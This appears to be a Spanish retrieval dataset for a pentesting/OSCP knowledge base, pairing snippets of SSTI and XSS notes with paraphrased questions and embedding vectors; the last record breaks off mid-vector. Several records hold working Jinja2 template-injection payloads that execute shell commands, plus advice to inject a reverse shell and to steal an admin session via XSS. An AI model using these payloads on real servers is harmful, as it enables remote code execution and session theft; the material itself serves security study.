"fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Identificar el motor\nUsa el Γ‘rbol de polyglots de PayloadsAllTheThings (Recursos pΓΊblicos) o **tplmap** para automatizar.", "indexar": "ΒΏCon quΓ© puedo analizar un sitio para ver quΓ© tecnologΓ­as usa?", "v": [-0.20239, 0.12358, -0.08013, 0.02593, 0.05923, -0.09587, -0.01216, -0.15865, -0.08747, -0.03797, -0.15347, -0.09984, -0.0251, 0.08288, 0.11796, 0.00535, 0.12635, -0.0909, 0.17179, -0.08324, 0.04615, -0.14439, -0.11276, -0.10476, -0.03074, -0.06294, 0.06816, -0.10745, -0.03244, -0.02516, -0.02352, 0.0167, 0.1288, -0.0026, -0.1019, 0.08881, 0.08014, 0.06889, 0.04827, -0.00594, -0.03309, -0.07296, -0.01823, -0.03826, 0.14137, -0.05373, -0.09134, -0.08295, -0.07542, 0.00232, -0.00856, 0.01165, -0.0366, 0.04131, 0.06548, 0.04326, 0.07295, -0.07892, 0.16616, -0.05355, -0.05548, 0.04846, -0.00714, 0.02629, -0.03901, -0.02126, -0.01762, -0.0166, -0.00977, 0.00288, 0.00943, -0.08791, 0.03276, -0.07678, 0.04421, 0.10718, 0.0008, 0.02839, 0.03733, -0.01114, 0.02733, 0.07435, -0.12003, 0.04841, -0.08773, -0.02876, 0.00824, -0.006, -0.05323, -0.13562, 0.07425, 0.09675, -0.04163, -0.03742, -0.01645, -0.02448, 0.06087, -0.01164, -0.00774, 0.13289, 0.02031, -0.06454, -0.07061, 0.04314, -0.03527, 0.08082, 0.01747, -0.11804, 0.03617, -0.1001, 0.00828, 0.02582, -0.13413, -0.05324, -0.11863, 0.03173, 0.01773, -0.03944, -0.12609, -0.00233, -0.07843, 0.07986, 0.03235, -0.07277, 0.03914, -0.0115, 0.01115, 0.05748, -0.01335, -0.00591, -0.01054, -0.0489, -0.09386, -0.02825, 0.06792, 0.05945, 0.05862, -0.08046, -0.02097, -0.02156, 0.06043, 0.03503, -0.13036, -0.00353, 0.00956, -0.01664, 0.01337, -0.00436, -0.15015, -0.06858, -0.00466, 0.01232, -0.03789, 0.02971, -0.0026, 0.01657, -0.01965, -0.07088, -0.08086, 0.04856, -0.02013, 0.01703, 0.00986, -0.00843, -0.01615, -0.0154, 0.00148, -0.01996, 0.03795, 0.10534, -0.03712, 0.06637, -0.03268, -0.09187, 0.02586, -0.03287, -0.04752, -0.00079, 0.00308, -0.107, -0.04787, -0.00841, -0.06496, -0.03823, -0.05209, 0.00353, 0.00043, -0.03564, 0.02871, 0.0783, 0.0357, 0.02488, 0.01876, -0.02521, 0.08325, -0.02198, -0.00643, -0.01654, -0.00823, -0.06506, -0.10148, -0.011, 0.02164, 0.00407, 0.00069, 0.06463, -0.02232, -0.02353, -0.03271, 0.01372, -0.03141, -0.04135, 0.04475, -0.06715, -0.07156, -0.03388, -0.00666, -0.0013, -0.06201, 0.03571, 0.03555, 0.04485, -0.02707, -0.01644, 0.02614, 0.07214, 0.02254, 0.00843, -0.00501, 0.04027, -0.02371, 0.00847, -0.05438, -0.00761, 0.02154, 0.01927, -0.02477, -0.02358, -0.11302, -0.00875, 0.04088, 0.0353, -0.05926, -0.03615, -0.03075, -0.03207, -0.16704, 0.04866, -0.0353, -0.05434, -0.03104, -0.01497, -0.00799, -0.0377, 0.05558, -0.00802]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Identificar el motor\nUsa el Γ‘rbol de polyglots de PayloadsAllTheThings (Recursos pΓΊblicos) o **tplmap** para automatizar.", "indexar": "ΒΏExiste una forma de detectar el servidor que estΓ‘ gestionando mi web?", "v": [-0.12713, 0.02359, -0.17696, -0.16952, 0.00789, -0.05381, -0.08132, -0.06372, 0.03828, -0.06232, -0.05747, -0.02753, -0.07408, -0.09375, 0.18559, 0.07396, 0.19139, -0.07031, 0.04246, -0.03646, 0.03558, 0.01431, 0.11361, 0.0096, -0.04904, -0.03968, -0.0072, -0.11546, -0.0564, 0.00368, -0.02701, -0.12008, -0.00653, -0.02986, 0.0087, 0.00746, 0.00547, 0.07503, -0.00474, 0.07001, 0.0859, -0.01057, -0.02458, -0.0395, 0.05829, 0.01656, 0.00027, -0.18611, 0.12977, 0.05898, -0.04497, -0.06069, -0.19762, -0.00322, -0.05263, -0.02422, 0.10626, -0.17176, 0.19489, -0.10487, -0.09706, 0.03408, -0.04213, -0.01013, 0.05017, -0.02883, 0.02214, -0.02412, -0.07619, -0.09761, -0.02367, -0.05358, 0.00823, 0.00042, 0.12451, 0.01249, 0.03183, 0.0023, 0.157, 0.03677, 0.03217, 0.0358, -0.03875, 0.11967, -0.09138, -0.04458, -0.05195, -0.01624, 0.07615, -0.03898, 0.05316, 0.05668, -0.07078, 0.05675, -0.01473, -0.10479, 0.08708, -0.03079, -0.00352, -0.00857, 0.0359, 0.0777, -0.05105, 0.0855, -0.00586, 0.05569, 0.07003, -0.04906, -0.0593, -0.04003, 0.045, -0.04017, -0.0217, -0.09015, -0.01812, -0.03329, 0.06273, 0.05928, -0.02129, -0.00488, -0.10099, -0.00454, 0.0292, 0.00808, 0.03308, -0.0776, 0.01414, 0.0523, 0.02893, -0.04268, -0.08273, -0.04047, -0.04837, -0.02101, -0.04027, 0.07393, 0.01949, -0.03106, -0.02659, 0.00675, -0.04247, 0.02465, -0.06922, 0.04345, 0.13203, -0.04246, 0.02731, -0.00708, -0.10436, 0.00975, 0.00289, -0.05157, -0.02434, -0.02487, -0.12416, 0.00147, 0.03787, -0.04821, -0.07335, 0.00631, -0.02815, 0.04723, 0.04318, 0.06644, 0.05974, 0.00734, 0.01193, 0.09613, 0.07898, 0.00923, -0.06698, 0.02232, -0.00841, -0.082, 0.03502, 0.01912, -0.07691, -0.11427, 0.04578, 0.02015, -0.02027, -0.02263, -0.01503, 0.01481, -0.05186, -0.01029, -0.0334, 0.01763, -0.07064, 0.04959, 0.09479, -0.0197, -0.02233, 0.0461, 0.07329, -0.00734, 0.05641, -0.03507, 0.01823, -0.03532, -0.05086, -0.09897, 0.01246, -0.00285, -0.05535, -0.03228, -0.05701, 0.01622, 0.03259, -0.00918, 0.01199, 0.01706, 0.09775, -0.06931, -0.02271, 0.00095, 0.08117, -0.05792, -0.01194, -0.08258, -0.03207, 0.01656, 0.03701, 0.01224, -0.00217, 0.0158, 0.0063, 0.01398, 0.09786, -0.01767, -0.01074, -0.00262, -0.03281, -0.00431, -0.02398, -0.05887, 0.03464, -0.07593, -0.06211, -0.04925, 0.05539, 0.07869, -0.00229, -0.05849, 0.00826, -0.06361, -0.04608, -0.00273, -0.03499, -0.02519, -0.03277, -0.02274, 0.05506, -0.04085, 0.02671, 0.04249]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Jinja2 (Python) β†’ RCE\n```python\n{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}\n{{ cycler.__init__.__globals__.os.popen('id').read() }}\n```", "indexar": "que programa hay para realizar un exploit de RCE en Python?", "v": [-0.12586, -0.0658, -0.14879, -0.21927, 0.10808, -0.13984, -0.02411, 0.00077, -0.08383, 0.01536, 0.10639, 0.02095, 0.04046, -0.01686, -0.09312, -0.0231, -0.14613, -0.01155, 0.04703, -0.01427, -0.10694, 0.04251, -0.0565, -0.01944, 0.12335, 0.20945, 0.00962, -0.00732, 0.01465, 0.02716, 0.10745, 0.10733, 0.02534, -0.01963, -0.05049, -0.10821, 0.15318, 0.01109, 0.05671, -0.03131, -0.07212, -0.13631, -0.14935, 0.16707, -0.05592, -0.00377, 0.04665, 0.02589, 0.05026, 0.00615, -0.01976, -0.0966, -0.10519, -0.03496, 0.16899, -0.04699, -0.09259, -0.02944, -0.07347, -0.03366, -0.02328, -0.01612, 0.05413, -0.05421, -0.03483, 0.03746, 0.07293, -0.02125, -0.10829, 0.12382, -0.04546, 0.08178, -0.02096, 0.03766, 0.02631, -0.05974, -0.12909, -0.02952, -0.04168, -0.03405, -0.12204, -0.05733, -0.03403, 0.08815, -0.05045, -0.06266, 0.09441, -0.07716, 0.0441, -0.03645, -0.00568, 0.09986, -0.01305, 0.02276, 0.01866, -0.02167, 0.17634, -0.01943, -0.00094, 0.03171, -0.00637, -0.05911, 0.0122, 0.12712, -0.09949, 0.09054, 0.01831, 0.05164, -0.06159, 0.01925, 0.02649, -0.04013, -0.06562, -0.0172, -0.141, -0.0781, -0.05548, -0.00191, -0.00196, -0.03279, -0.08766, 0.06054, -0.08242, 0.0448, 0.03748, 0.02615, 0.01401, 0.13405, -0.01183, -0.01049, -0.04543, 0.0248, 0.02759, 0.00725, -0.10375, 0.01152, 0.0867, -0.05869, 0.01936, -0.00763, -0.02467, 0.0496, 0.0151, 0.05369, 0.05646, -0.01475, 0.01822, -0.06419, -0.05776, 0.00162, 0.06272, -0.0128, -0.05613, 0.0752, -0.08627, -0.05565, -0.03134, 0.00898, -0.01923, -0.00127, -0.02097, -0.02769, -0.04279, -0.11357, 0.0688, -0.06146, -0.00573, 0.01352, 0.05136, 0.06572, -0.01191, 0.06519, 0.07638, -0.03712, -0.00036, -0.03104, 0.03382, -0.06991, -0.00196, -0.01732, -0.08659, -0.02683, 0.0504, 0.02791, 0.03938, -0.0193, 0.02088, 0.02256, -0.01946, -0.00482, 0.0243, 0.04186, -0.00571, -0.0039, 0.00473, -0.00237, -0.02373, 0.01249, 0.06927, -0.04145, -0.00112, 0.00024, -0.03869, -0.01695, -0.00657, 0.07405, -0.06144, -0.04565, -0.01638, 0.00719, 0.01003, 0.00156, 0.03304, -0.03775, 0.04479, -0.01084, 0.00643, 0.11718, 0.05966, 0.02053, -0.08754, 0.02515, 0.06844, 0.02576, -0.05212, -0.05597, 0.0342, 0.00868, 0.0262, -0.0053, -0.05144, -0.07467, 0.00755, -0.00771, -0.00863, -0.02201, -0.01253, -0.0331, -0.01076, -0.05843, -0.02186, 0.05082, 0.027, -0.04509, 0.0007, 0.01564, -0.03772, 0.02514, 0.01157, 0.01119, -0.05083, -0.00295, -0.0163, -0.0746, 0.00499, 0.04896]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Jinja2 (Python) β†’ RCE\n```python\n{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}\n{{ cycler.__init__.__globals__.os.popen('id').read() }}\n```", "indexar": "con que puedo montar un ataque de ejecuciΓ³n remota de comandos usando Jinja2?", "v": [0.02301, 0.03301, -0.19819, -0.14544, -0.04258, 0.03975, -0.02336, 0.10653, -0.13465, 0.02227, -0.00929, -0.03672, 0.11377, 0.04468, 0.05762, 0.01431, 0.1342, 0.07881, -0.02653, -0.12163, 0.01901, -0.05572, 0.15563, -0.01641, -0.01581, 0.12625, 0.06398, 0.05916, -0.06286, -0.12428, 0.09006, 0.01504, 0.10517, 0.00697, 0.01193, -0.00806, -0.04111, 0.02581, 0.02704, 0.18524, -0.01685, 0.00509, -0.21633, -0.08902, 0.00374, 0.03102, 0.14571, 0.00618, 0.02682, -0.01974, 0.07539, 0.02804, -0.12782, -0.0541, -0.04331, -0.09902, 0.16818, -0.06975, 0.01205, -0.04098, 0.00143, -0.02288, -0.01759, 0.046, 0.08329, -0.11737, -0.02096, -0.07136, -0.08548, 0.0044, -0.0424, 0.02343, -0.07682, 0.02785, 0.05685, -0.06933, -0.05937, 0.04872, 0.13864, 0.03267, -0.05423, -0.03834, -0.07491, 0.07623, -0.08441, -0.11689, -0.05188, -0.06829, -0.05309, -0.08056, 0.03826, -0.05845, 0.02453, 0.00035, 0.04352, -0.02141, 0.02514, 0.04243, 0.08526, -0.02471, -0.02584, 0.02999, -0.04461, 0.13742, 0.05567, 0.01333, 0.07188, -0.07675, 0.03041, -0.07677, 0.03793, -0.0289, -0.09989, -0.06365, -0.09629, -0.1515, -0.07062, -0.02029, -0.0044, 0.0292, -0.09517, 0.01411, -0.00149, 0.09201, -0.0276, -0.06856, -0.04115, -0.00518, -0.00184, -0.02951, -0.00797, -0.02068, 0.12047, -0.06755, -0.07611, 0.11866, 0.02692, -0.07618, -0.11331, -0.07646, 0.06582, 0.03204, 0.02669, 0.01877, 0.06233, 0.03183, 0.03005, -0.06413, -0.06715, 0.05167, 0.08814, 0.03478, -0.05768, 0.05974, -0.06916, -0.10528, -0.06918, -0.00741, -0.01565, 0.11236, -0.04795, 0.01242, -0.07131, 0.04219, -0.00317, -0.03907, -0.02828, -0.09964, 0.01422, 0.02009, -0.09581, 0.06028, 0.02796, 0.02382, 0.03421, -0.07316, 0.01639, -0.02876, 0.02649, 0.04781, -0.01043, -0.00489, -0.07318, -0.00852, 0.02144, -0.0256, 0.02053, 0.01077, -0.00651, 0.00514, -0.00027, 0.03641, 0.0343, 0.01311, 0.01543, -0.0645, -0.00486, 0.02351, -0.0342, 0.00573, -0.04237, -0.03336, -0.00018, -0.02512, 0.08813, 0.01638, -0.01409, 0.03604, 0.04703, 0.05321, 0.03083, -0.03089, 0.0578, -0.04183, -0.05218, -0.03019, 0.024, 0.01047, -0.00844, 0.02488, -0.00778, 0.01366, 0.06153, 0.00386, 0.0331, 0.06184, -0.02027, -0.04057, 0.03254, 0.00192, -0.05423, -0.01591, 0.01299, -0.04294, 0.00463, -0.02449, 0.02918, 0.00208, -0.05611, 0.01307, -0.0224, 0.06087, 0.0018, -0.05465, -0.03136, -0.06197, -0.12267, 0.0397, -0.02332, -0.05624, -0.04032, 0.03846, -0.00609, -0.02919, -0.02459, -0.01475]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Jinja2 (Python) β†’ RCE\n```python\n{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}\n{{ cycler.__init__.__globals__.os.popen('id').read() }}\n```", "indexar": "cual es una alternativa libre a las herramientas para pruebas de seguridad con Python?", "v": [-0.09229, -0.00483, -0.10266, -0.2443, -0.09214, -0.12965, -0.12304, -0.04989, -0.05339, -0.02532, 0.01544, -0.00316, -0.02274, 0.01678, -0.03137, -0.04968, -0.02877, -0.11942, 0.10519, -0.03118, -0.10627, 0.00466, -0.17629, -0.13535, 0.07573, 0.07832, 0.01148, 0.04667, -0.11153, 0.04928, 0.02286, 0.06493, 0.09773, 0.05495, -0.15765, 0.01702, 0.12235, 0.1188, 0.09765, 0.03045, -0.06373, -0.13884, 0.00876, 0.10464, -0.02555, -0.04998, -0.01439, 0.04797, -0.00029, 0.0248, -0.09362, -0.16324, -0.04572, -0.0649, 0.07311, -0.09838, 0.08315, -0.04511, 0.02067, -0.03113, -0.17899, -0.05753, 0.03582, 0.02562, -0.00931, 0.00458, -0.02665, -0.03271, -0.14381, 0.12382, 0.03894, 0.00472, -0.00971, 0.05479, -0.1078, -0.06612, -0.10455, 0.01353, -0.04886, 0.08096, -0.06466, -0.04751, -0.01894, 0.05103, -0.06268, -0.12106, 0.01423, -0.09263, 0.03491, 0.03513, 0.08057, 0.12386, 0.06078, 0.08093, 0.01979, 0.0084, 0.08976, -0.01404, -0.00406, -0.03235, 0.08069, -0.03911, 0.00113, 0.04481, -0.05803, -0.02465, -0.06044, 0.13496, -0.05957, -0.02736, 0.04357, 0.06545, -0.01058, 0.03163, -0.08813, -0.08657, -0.03775, -0.03664, -0.00487, -0.00407, 0.03511, 0.03561, -0.11341, 0.01156, 0.01787, 0.02655, 0.08372, 0.05005, -0.01764, -0.00537, 0.08195, -0.03026, -0.10857, -0.0093, -0.08861, 0.04669, 0.06132, -0.12559, 0.01344, -0.02609, -0.02598, 0.01803, 0.00991, -0.02669, 0.02968, 0.00812, -0.0391, -0.00374, -0.04793, -0.01821, -0.01767, -0.01823, -0.02483, 0.09571, -0.10462, 0.0036, -0.08798, 0.01349, -0.0462, -0.02324, 0.03132, -0.0573, 0.02134, -0.04106, 0.04916, 0.00024, 0.04019, -0.01425, -0.04367, -3e-05, 0.0497, 0.04063, 0.09026, -0.05085, 0.05484, -0.06341, -0.00094, -0.10603, -0.0466, -0.06494, 0.02438, -0.01111, -0.10158, -0.015, 0.11451, -0.08677, 0.05268, 0.02511, 0.05563, 0.04169, -0.04979, 0.05826, -0.07189, -0.05954, -0.00327, 0.04627, 0.0506, -0.04912, -0.01583, -0.01032, -0.02904, -0.03513, -0.03964, -0.03316, -0.00662, 0.04649, -0.06173, -0.02116, 0.0151, -0.0401, 0.03962, 0.03204, 0.0891, -0.0314, -0.00391, -0.02203, 0.00315, 0.05214, -0.02247, 0.0119, -0.02747, 0.03085, 0.03713, 0.01961, -0.05468, 0.00875, -0.00889, 0.02843, 0.0098, -0.01468, 0.01705, -0.02467, -0.02454, 0.0485, 0.0064, -0.04034, -0.00806, 0.0259, 0.00464, -0.03251, -0.03004, 0.07835, -0.02294, -0.05907, -0.0647, 0.01983, -0.05133, -0.04226, -0.05087, -0.03335, -0.03799, 0.00291, 0.00658, -0.05169, -0.00904, 0.01455]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De RCE a shell\nInyecta el comando de Reverse shell dentro del payload β†’ listener en Kali.\n\nRelacionado: Command injection Β· XSS Β· OSCP MOC", "indexar": "cual es una tecnica para inyectar un reverse shell dentro de un payload?", "v": [0.10324, 0.00396, -0.09819, 0.03669, 0.03755, -0.06678, -0.03195, -0.05536, 0.05421, 0.09896, -0.16471, 0.01703, 0.00449, 0.05272, -0.06883, 0.07354, -0.12459, -0.10675, 0.06778, -0.05924, -0.08086, 0.00244, -0.09079, -0.04431, -0.04256, 0.14579, -0.02296, 0.03317, -0.2368, -0.09549, -0.04075, -0.03127, 0.12912, -0.04722, -0.03532, 0.03625, 0.07419, 0.06343, 0.00713, 0.11831, -0.09343, -0.02314, -0.16753, 0.12154, 0.13867, 0.00476, 0.11552, 0.02851, 0.07218, -0.07613, -0.05516, 0.02616, -0.07427, 0.07489, -0.01665, -0.10169, 0.15753, -0.05943, 0.00282, -0.0453, -0.09311, 0.09185, -0.00131, 0.01218, -0.0023, -0.1207, -0.07772, -0.04413, -0.06387, -0.1628, 0.02492, 0.02867, -0.01359, 0.03542, -0.08965, 0.00942, -0.02941, 0.08995, 0.03486, 0.03462, -0.03934, -0.01816, -0.1241, 0.07129, 0.03754, -0.03369, 0.11905, -0.00625, 0.10245, -0.07249, 0.04146, -0.02365, -0.0672, 0.11034, -0.041, -0.04638, 0.03535, 0.0169, -0.06227, 0.00486, 0.04064, -0.01, 0.03216, 0.06454, 0.083, 0.10577, -0.02946, -0.1414, 0.02889, -0.02189, 0.05171, -0.00405, 0.00461, 0.07521, -0.06435, -0.11627, -0.05922, 0.02671, 0.01165, -0.06405, -0.05042, 0.02244, -0.00258, -0.01461, 0.02269, -0.03762, -0.07959, 0.07633, 0.04067, 0.04642, 0.00298, 0.02901, -0.01897, 0.00194, -0.01919, 0.04567, 0.14706, -0.0256, -0.06052, 0.04754, 0.05496, 0.09646, 0.05011, 0.01745, 0.03409, -0.00161, 0.07451, -0.10016, -0.10394, -0.03575, 0.03221, 0.08297, 0.02382, 0.06007, -0.03102, -0.06921, 0.08629, -0.05401, 0.00025, -0.02174, -0.02483, 0.08251, -0.01067, 0.00559, -0.05031, -0.02853, -0.10735, -0.04548, -0.02177, 0.02958, 0.0088, -0.04655, -0.00266, 0.06212, 0.01909, -0.02227, -0.04689, -0.02696, 0.05148, -0.04811, -0.04391, 0.00765, 0.03149, 0.01828, 0.02441, -0.03818, -0.00941, 0.0593, 0.05208, 0.04047, 0.053, 0.05361, -0.05316, -0.07098, -0.0512, -0.01643, -0.03037, -0.03179, 0.04863, 0.01591, 0.03437, 0.00151, -0.00896, -0.0518, -0.0327, -0.02553, -0.05949, -0.01194, -0.00676, -0.03332, 0.0728, -0.04465, 0.12331, 0.03302, -0.04416, 0.01737, 0.01833, -0.02579, -0.01885, 0.07181, 0.03681, 0.01544, 0.06151, -0.04768, -0.04814, 0.00241, 0.06054, 0.04444, 0.05513, 0.00987, -0.02229, 0.07886, -0.0086, 0.02702, 0.04155, 0.06814, 0.01418, -0.05108, -0.03535, -0.03812, 0.06705, 0.03113, -0.05164, -0.06895, 0.00755, -0.00731, -0.06291, 0.03061, -0.01645, -0.00437, -0.01525, 0.06045, 0.01574, -0.02739, 0.0724, -0.07709]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De RCE a shell\nInyecta el comando de Reverse shell dentro del payload β†’ listener en Kali.\n\nRelacionado: Command injection Β· XSS Β· OSCP MOC", "indexar": "que metodo puedo usar para conectar con un listener desde kali usando comandos?", "v": [0.08978, 0.17454, -0.2409, -0.10685, -0.05632, -0.06501, -0.07795, 0.00963, -0.11293, -0.08956, -0.1851, -0.0557, 0.01577, -0.02187, -0.00692, 0.01057, 0.18132, -0.00566, -0.03239, -0.11716, 0.06174, -0.02713, -0.06927, -0.0615, 0.00044, 0.12399, 0.16211, -0.10478, -0.07447, -0.03152, -0.07093, 0.01336, 0.04014, 0.0339, -0.08511, -0.03068, -0.06935, 0.11692, 0.01131, 0.18095, -0.05862, 0.03469, -0.14593, 0.00676, 0.0279, -0.00608, 0.05793, -0.05375, -0.00236, 0.06986, -0.04277, -0.02272, -0.18727, 0.00603, -0.09448, -0.09538, 0.10122, -0.09002, 0.00221, -0.03866, -0.02973, -0.05755, 0.0168, 0.10854, 0.00217, -0.09311, 0.00194, -0.02998, -0.10295, 0.07592, -0.04093, 0.06608, -0.03988, 0.07312, 0.11286, 0.08406, 0.04304, -0.05041, 0.15898, -0.03173, -0.05678, -0.08086, -0.03608, 0.00376, -0.11996, 0.01792, 0.09701, -0.05824, -0.03517, -0.04902, -0.01625, -0.01014, 0.00418, -0.07513, 0.08737, -0.02741, -0.00592, 0.0146, 0.02928, -0.00857, 0.14905, 0.00986, -0.06157, 0.18512, 0.0923, -0.0035, 0.07514, -0.1022, 0.02369, -0.01857, -0.0518, -0.0322, -0.02097, -0.08026, -0.0681, -0.05692, 0.00703, -0.06192, -0.04303, -0.03605, -0.05498, 0.03496, -0.00117, 0.04464, 0.03046, -0.02955, -0.01372, 0.05136, 0.02246, 0.039, 0.00563, 0.02546, 0.04974, -0.0827, -0.01138, 0.04766, -0.00975, -0.04196, -0.08653, -0.0114, 0.01993, 0.06937, -0.02558, -0.01719, 0.06053, -0.04481, 0.00146, -0.07419, -0.06237, -0.06728, 0.0383, 0.03087, -0.10232, 0.02177, -0.03299, -0.04725, 0.0632, -0.04594, -0.00382, 0.06485, -0.04545, 0.00711, 0.02006, 0.01042, 0.05106, -0.06535, -0.06152, -0.03049, -0.00566, 0.00352, -0.00447, 0.02451, 0.07574, -0.03016, 0.01, -0.03117, -0.03143, -0.00706, 0.02778, -0.00513, -0.03435, 0.05673, -0.08125, -0.05855, 0.03174, 0.02791, 0.00516, 0.02335, -0.00922, 0.05067, -0.05177, 0.07115, 0.01291, 0.0051, 0.02714, -0.02376, 0.04331, -0.05074, -0.08804, 0.00938, -0.08509, 0.06329, 0.02926, -0.07056, 0.07152, -0.00307, -0.05705, 0.02346, 0.03914, 0.05014, 0.04262, -0.05688, 0.05417, 0.0041, -0.04459, 0.00166, -0.06428, -0.0364, -0.05699, 0.02969, 0.01524, 0.06364, 0.01928, 0.01462, -0.00551, 0.01667, -0.02029, -0.04076, 0.02073, 0.04619, -0.02361, 0.01867, 0.00427, -0.02198, -0.00883, 0.02757, -0.00773, -0.01031, -0.04872, -0.02943, 0.01882, 0.04388, 0.01932, -0.01103, 0.00662, -0.06591, -0.09554, 0.02902, -0.01018, -0.06252, 0.02056, 0.018, 0.02781, -0.04672, -0.01021, -0.0286]} +{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De RCE a shell\nInyecta el comando de Reverse shell dentro del payload β†’ listener en Kali.\n\nRelacionado: Command injection Β· XSS Β· OSCP MOC", "indexar": "como montas un reverse shell a traves de una inyeccion de comando?", "v": [0.02287, -0.1099, -0.07642, 0.05348, -0.05938, 0.02706, -0.02174, 0.00213, -0.07884, -0.04047, -0.11022, -0.01631, 0.02027, -0.15759, 0.06794, 0.1257, -0.0058, 0.06695, 0.00324, -0.09677, -0.07643, -0.0978, 0.03073, -0.05064, 0.02229, 0.11609, 0.04486, 0.02757, -0.13134, -0.11572, -0.06721, -0.03807, 0.0584, -0.02246, -0.02767, -0.02117, -0.02191, -0.01897, 0.02849, 0.245, -0.08715, -0.11951, -0.23654, 0.13036, -0.02703, -0.10314, 0.03789, -0.02199, -0.00321, 0.03382, -0.03748, -0.10447, -0.11354, -0.01624, 0.00299, -0.04605, 0.12859, 0.00561, 0.02615, -0.05615, -0.0845, -0.01482, -0.01407, 0.15331, 0.02544, -0.06164, -0.12611, -0.19224, -0.08699, -0.1016, -0.0268, 0.04618, -0.07004, 0.0689, -0.02609, -0.04509, -0.01265, 0.02532, 0.021, -0.04178, -0.08298, -0.0674, -0.07677, 0.12753, 0.01033, -0.06178, -0.01185, -0.06782, 0.01138, 0.04629, 0.02326, -0.01052, 0.07032, 0.02932, 0.00143, 0.05631, -0.03779, 0.12974, -0.00093, 0.00701, -0.05658, -0.03869, -0.00909, 0.19208, 0.03378, 0.10931, -0.03487, -0.04642, 0.00525, 0.14264, 0.03353, -0.07453, 0.04968, 0.01593, 0.01091, -0.09375, -0.01927, 0.00176, 0.047, -0.05217, -0.12545, 0.05733, -0.00301, 0.08901, -0.00706, 0.02918, -0.05002, 0.0115, 0.06125, 0.01835, 0.02037, 0.0057, 0.01277, -0.06791, -0.01719, 0.15419, 0.02084, 0.02976, -0.04609, -0.08472, -0.02967, 0.08996, -0.00063, 0.0292, 0.03445, -0.02767, 0.06742, -0.12813, -0.05139, 0.03357, -0.01522, 0.14227, -0.01985, 0.05722, 0.02616, -0.03296, -0.00154, -0.02972, 0.01214, 0.00331, -0.05814, -0.01858, 0.03154, 0.05168, 0.00466, -0.03537, -0.08547, -0.00761, -0.00142, -0.03662, -0.08633, 0.03004, 0.00502, 0.04979, 0.02691, -0.03462, 0.02594, 0.02135, 0.00701, 0.02237, 0.05059, 0.00049, -0.02534, -0.05292, 0.00821, -0.0403, -0.02638, 0.04042, -0.03967, 0.01022, 0.08914, 0.06489, -0.00071, -0.05913, 0.00594, 0.01154, 0.05859, 0.0013, 0.00774, 0.03553, -0.00883, 0.0886, 0.04461, -0.11316, -0.00224, -0.06046, -0.0484, 0.07511, -0.01103, -0.00824, 0.03124, -0.01785, 0.04639, 0.10483, -0.00489, -0.02125, 0.0381, 0.03671, -0.02621, 0.024, -0.01628, 0.00305, 0.02837, 0.0799, -0.00436, -0.0219, -0.029, 0.02784, 0.00683, 0.03496, -0.03177, -0.00673, -0.00119, 0.03422, -0.0216, 0.01307, -0.00186, -0.0127, 0.02853, -0.03892, -0.00531, 0.08613, -0.00318, -0.04688, 0.00556, -0.04174, -0.07169, 0.03337, 0.00309, 0.00845, -0.02077, 0.01511, -0.03135, -0.01876, -0.01194, -0.0839]} +{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# XSS (Cross-Site Scripting)\n\n> Inyectas JavaScript que se ejecuta en el navegador de otro usuario. En OSCP pesa menos que SQLi/RCE, pero aparece (sobre todo para robar sesiΓ³n de un admin). Vector de Hacking web.", "indexar": "que tecnica sirve para inyectar JavaScript y robar sesion de administrador", "v": [0.00616, -0.06591, -0.10009, -0.23435, 0.07107, -0.08365, 0.07747, 0.00761, 0.09682, 0.05061, -0.03049, -0.22532, 0.18935, -0.01626, 0.12597, 0.03667, 0.02635, -0.04525, 0.05783, 0.06593, 0.06464, 0.07227, 0.07226, -0.06197, -0.01642, 0.02303, -0.03362, -0.05466, -0.16002, 0.00806, -0.01221, -0.05791, 0.11269, -0.03389, -0.0582, -0.01586, 0.1547, -0.06674, -0.07262, 0.16691, 0.01044, -0.05683, -0.18008, -0.0348, 0.03905, 0.0389, 0.07735, -0.03371, 0.11244, 0.08211, 0.02895, -0.02612, -0.08232, 0.01219, -0.05901, 0.06631, 0.04613, -0.04535, 0.02439, -0.04345, -0.0487, -0.0396, -0.09651, -0.04082, 0.04402, -0.08808, 0.02386, -0.06445, 0.07862, -0.06485, -0.15118, 0.08899, -0.12045, 0.05409, 0.0092, 0.02126, -0.09146, 0.0681, 0.02428, -0.03584, -0.05986, 0.08727, -0.13423, 0.05364, -0.04139, -0.00418, 0.18589, -0.07513, 0.04796, -0.06785, 0.05815, -0.01696, -0.02817, -0.07543, 0.00338, -0.07419, 0.11938, 0.05141, -0.00953, 0.00854, 0.06545, -0.08781, -0.09225, 0.09458, 0.02193, 0.14221, 0.02298, -0.06545, 0.0314, -0.09941, -0.02399, 0.03186, -0.09776, 0.03593, 0.02178, 0.0027, -0.05453, -0.03861, -0.11381, -0.0169, 0.00197, -0.05157, 0.01362, -0.05706, 0.05208, -0.00067, 0.05529, 0.10682, -0.0085, -0.03873, -0.01587, 